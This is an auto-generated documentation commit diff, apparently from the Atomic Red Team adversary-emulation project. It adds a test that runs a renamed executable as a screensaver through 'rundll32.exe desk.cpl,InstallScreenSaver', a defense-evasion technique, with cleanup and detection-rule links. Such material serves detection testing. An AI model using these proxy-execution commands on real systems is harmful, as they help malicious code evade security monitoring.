Generated docs from job=generate-docs branch=master [ci skip]

2022-04-30 01:44:53 +00:00
parent c99b1399ec
commit a6f3763249
6 changed files with 68 additions and 0 deletions
@@ -617,6 +617,7 @@ defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and p
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
 defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
+defense-evasion,T1218.011,Rundll32,12,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
 defense-evasion,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
@@ -438,6 +438,7 @@ defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and p
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
 defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
+defense-evasion,T1218.011,Rundll32,12,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
 defense-evasion,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
@@ -942,6 +942,7 @@
  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
+  - Atomic Test #12: Rundll32 with desk.cpl [windows]
 - [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -687,6 +687,7 @@
  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
+  - Atomic Test #12: Rundll32 with desk.cpl [windows]
 - [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -39594,6 +39594,25 @@ defense-evasion:
        command: 'rundll32.exe shell32.dll,Control_RunDLL #{input_file}

          '
+    - name: Rundll32 with desk.cpl
+      auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917
+      description: "Rundll32.exe loading an executable renamed as .scr using desk.cpl
+        \nReference: \n  - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)\nSIGMA
+        rules:\n  - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_new_src_file.yml)\n
+        \ - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        exe_to_launch:
+          description: Path of the executable to launch
+          type: Path
+          default: "%windir%\\System32\\calc.exe"
+      executor:
+        name: command_prompt
+        command: |
+          copy #{exe_to_launch} not_an_scr.scr
+          rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
+        cleanup_command: del not_an_scr.scr
  T1134.005:
    technique:
      object_marking_refs:
@@ -32,6 +32,8 @@ Adversaries may also attempt to obscure malicious code from analysis by abusing

 - [Atomic Test #11 - Rundll32 with Control_RunDLL](#atomic-test-11---rundll32-with-control_rundll)

+- [Atomic Test #12 - Rundll32 with desk.cpl](#atomic-test-12---rundll32-with-deskcpl)
+

 <br/>

@@ -499,4 +501,47 @@ Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"



+<br/>
+<br/>
+
+## Atomic Test #12 - Rundll32 with desk.cpl
+Rundll32.exe loading an executable renamed as .scr using desk.cpl 
+Reference: 
+  - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)
+SIGMA rules:
+  - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_new_src_file.yml)
+  - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 83a95136-a496-423c-81d3-1c6750133917
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| exe_to_launch | Path of the executable to launch | Path | %windir%&#92;System32&#92;calc.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+copy #{exe_to_launch} not_an_scr.scr
+rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
+```
+
+#### Cleanup Commands:
+```cmd
+del not_an_scr.scr
+```
+
+
+
+
+
 <br/>